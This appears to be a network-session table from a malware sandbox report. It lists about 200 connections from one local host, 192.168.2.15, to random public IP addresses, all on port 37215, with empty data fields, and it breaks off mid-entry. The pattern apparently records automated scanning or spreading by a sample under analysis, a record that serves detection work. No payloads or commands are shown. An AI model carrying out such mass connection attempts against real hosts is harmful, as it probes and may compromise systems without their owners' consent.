                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20794192.168.2.1534586222.172.122.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20795192.168.2.1535056122.33.215.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20796192.168.2.1554042121.233.84.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20797192.168.2.1559404202.95.71.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20798192.168.2.1540950181.78.16.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20799192.168.2.155887241.15.124.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20800192.168.2.1543928138.110.114.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20801192.168.2.1555468197.1.45.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20802192.168.2.155562437.88.204.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20803192.168.2.155432094.15.32.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20804192.168.2.1539448156.156.160.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20805192.168.2.1559914102.135.186.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20806192.168.2.1552942157.165.81.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20807192.168.2.1559882122.135.59.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20808192.168.2.153795837.86.6.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20809192.168.2.1558124222.227.32.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20810192.168.2.154423037.182.165.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20811192.168.2.1541830222.57.10.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20812192.168.2.154139841.246.152.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20813192.168.2.1533654102.207.161.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20814192.168.2.1557528156.89.205.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20815192.168.2.153435641.238.227.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20816192.168.2.153714641.184.248.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20817192.168.2.155021837.140.52.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20818192.168.2.155005237.27.22.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20819192.168.2.1554252190.48.131.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20820192.168.2.155595241.78.106.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20821192.168.2.1546826157.98.21.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20822192.168.2.155389445.27.50.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20823192.168.2.1555748217.173.78.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20824192.168.2.1533414121.243.183.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20825192.168.2.153755494.114.191.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20826192.168.2.155409437.89.118.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20827192.168.2.154766431.216.94.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20828192.168.2.1537718156.131.198.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20829192.168.2.1550360222.156.235.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20830192.168.2.1542480222.215.172.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20831192.168.2.1559974222.196.71.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20832192.168.2.1541356181.150.109.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20833192.168.2.153619037.116.48.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20834192.168.2.1549716121.201.200.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20835192.168.2.1546604122.79.88.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20836192.168.2.1536632190.210.106.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20837192.168.2.1536778102.87.212.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20838192.168.2.155903841.134.151.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20839192.168.2.1552608186.32.251.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20840192.168.2.1539324121.38.90.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20841192.168.2.156066031.24.46.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20842192.168.2.1550822157.87.241.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20843192.168.2.1543856190.220.152.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20844192.168.2.1552456222.168.176.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20845192.168.2.155579637.216.111.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20846192.168.2.1559728197.218.104.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20847192.168.2.1552122190.168.4.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20848192.168.2.1542624181.120.140.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20849192.168.2.1537170181.172.8.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20850192.168.2.1558058138.130.195.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20851192.168.2.153603841.112.211.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20852192.168.2.154606288.111.226.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20853192.168.2.1560298122.141.226.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20854192.168.2.1539340190.227.74.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20855192.168.2.153493837.161.58.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20856192.168.2.1554296138.94.93.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20857192.168.2.1538266190.51.213.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20858192.168.2.154741245.121.163.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20859192.168.2.1539680121.16.243.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20860192.168.2.155263231.237.3.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20861192.168.2.1557562122.197.60.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20862192.168.2.154096441.46.31.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20863192.168.2.1549080181.142.148.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20864192.168.2.1544636157.185.53.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20865192.168.2.1546516102.248.44.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20866192.168.2.155159641.200.68.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20867192.168.2.1551142197.97.165.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20868192.168.2.1543192197.252.156.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20869192.168.2.154403831.198.119.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20870192.168.2.1536858186.153.248.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20871192.168.2.1559322122.101.239.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20872192.168.2.1537688102.133.237.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20873192.168.2.1536714138.32.39.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20874192.168.2.1540602138.211.186.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20875192.168.2.153408645.173.30.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20876192.168.2.1558626157.106.45.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20877192.168.2.1540592157.212.194.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20878192.168.2.155780894.254.252.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20879192.168.2.1540884156.95.95.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20880192.168.2.1541882102.195.90.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20881192.168.2.1558290197.238.38.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20882192.168.2.1533844190.122.209.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20883192.168.2.1550724197.171.203.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20884192.168.2.1536382157.22.234.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20885192.168.2.1533000122.236.129.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20886192.168.2.155191837.108.215.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20887192.168.2.153606041.85.111.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20888192.168.2.1541520121.53.46.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20889192.168.2.1535514190.14.218.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20890192.168.2.153546694.106.163.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20891192.168.2.1559094190.95.192.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20892192.168.2.1544464121.146.23.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20893192.168.2.1547166197.209.121.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20894192.168.2.155809431.40.169.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20895192.168.2.154999237.202.34.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20896192.168.2.1556434121.68.48.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20897192.168.2.1535858222.168.137.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20898192.168.2.1559798138.38.29.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20899192.168.2.1541336190.202.238.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20900192.168.2.1542294121.207.249.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20901192.168.2.1543134222.44.18.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20902192.168.2.1550566190.152.24.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20903192.168.2.1540936122.146.28.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20904192.168.2.1551052138.61.236.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20905192.168.2.1550066157.203.163.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20906192.168.2.1546668157.64.54.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20907192.168.2.1536288102.33.107.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20908192.168.2.1555836222.32.184.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20909192.168.2.1541762156.133.238.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20910192.168.2.154966294.74.234.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20911192.168.2.1554664102.218.161.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20912192.168.2.1557418156.27.110.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20913192.168.2.154948241.87.115.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20914192.168.2.1553294222.26.172.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20915192.168.2.1549542157.174.112.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20916192.168.2.1537026121.229.178.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20917192.168.2.1559116102.43.155.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20918192.168.2.1546000121.20.248.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20919192.168.2.1533096156.231.73.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20920192.168.2.1534086190.204.250.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20921192.168.2.156035241.181.149.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20922192.168.2.1546130186.146.74.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20923192.168.2.1539924186.114.215.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20924192.168.2.1558204106.172.129.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20925192.168.2.1556112186.22.188.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20926192.168.2.1539976222.38.187.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20927192.168.2.154253645.204.36.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20928192.168.2.1538472186.78.221.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20929192.168.2.1554430190.67.224.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20930192.168.2.1559152156.244.12.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20931192.168.2.1533894138.112.0.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20932192.168.2.1546686197.61.164.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20933192.168.2.1545538222.34.0.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20934192.168.2.1540582181.117.145.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20935192.168.2.1558846102.45.101.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20936192.168.2.1551674197.127.2.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20937192.168.2.1560830181.61.113.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20938192.168.2.154173645.13.243.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20939192.168.2.153717045.134.240.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20940192.168.2.1537976156.116.94.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20941192.168.2.154810294.161.193.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20942192.168.2.1555562156.43.25.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20943192.168.2.154611831.215.45.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20944192.168.2.1549658122.206.110.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20945192.168.2.154140294.87.106.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20946192.168.2.1541266138.86.159.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20947192.168.2.1542460122.154.133.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20948192.168.2.1535322122.62.28.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20949192.168.2.153479831.66.139.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20950192.168.2.1542020138.141.149.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20951192.168.2.154437288.27.157.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20952192.168.2.1548874122.216.134.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20953192.168.2.1547758156.158.112.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20954192.168.2.1552992102.232.61.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20955192.168.2.153787241.92.228.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20956192.168.2.1551952197.25.242.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20957192.168.2.1546014197.29.22.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20958192.168.2.153428094.22.215.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20959192.168.2.1545124156.175.168.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20960192.168.2.1536542138.118.119.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20961192.168.2.1535912138.87.189.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20962192.168.2.154286441.56.141.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20963192.168.2.1533692181.223.129.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20964192.168.2.155881037.238.107.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20965192.168.2.1549412157.179.231.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20966192.168.2.1560358187.76.80.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20967192.168.2.1554946156.18.155.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20968192.168.2.1537984158.237.108.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20969192.168.2.1534404157.3.102.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20970192.168.2.153717894.119.31.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20971192.168.2.1541190156.92.194.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20972192.168.2.1560328222.128.162.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20973192.168.2.1534602197.216.174.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20974192.168.2.154426294.124.17.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20975192.168.2.1557360157.138.105.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20976192.168.2.153913045.87.146.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20977192.168.2.1546332121.33.209.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20978192.168.2.153945241.187.191.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20979192.168.2.154723237.208.104.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20980192.168.2.1539714102.220.82.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20981192.168.2.155329831.48.4.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20982192.168.2.1544844122.243.70.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20983192.168.2.155913231.220.106.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20984192.168.2.1542374121.204.192.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20985192.168.2.1539992122.205.65.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20986192.168.2.1534622157.109.228.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20987192.168.2.1557970102.155.229.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20988192.168.2.155657641.242.116.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20989192.168.2.153504437.18.121.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20990192.168.2.1544694186.100.40.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20991192.168.2.1541612181.150.230.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20992192.168.2.1543560122.232.149.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20993192.168.2.1553494222.197.222.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20994192.168.2.1542894186.21.247.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20995192.168.2.155471441.86.17.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20996192.168.2.1540576222.95.200.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20997192.168.2.153305041.108.119.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20998192.168.2.1540650122.170.106.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20999192.168.2.1546556119.27.86.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21000192.168.2.1551520122.36.159.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21001192.168.2.153354241.206.58.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21002192.168.2.1535622197.106.79.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21003192.168.2.155200641.227.13.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21004192.168.2.154018831.61.29.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21005192.168.2.1535604181.172.209.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21006192.168.2.1542948213.88.66.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21007192.168.2.1558022186.246.119.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21008192.168.2.1553218181.148.52.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21009192.168.2.1558562122.172.39.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21010192.168.2.1543442186.139.131.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21011192.168.2.1541156156.127.176.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
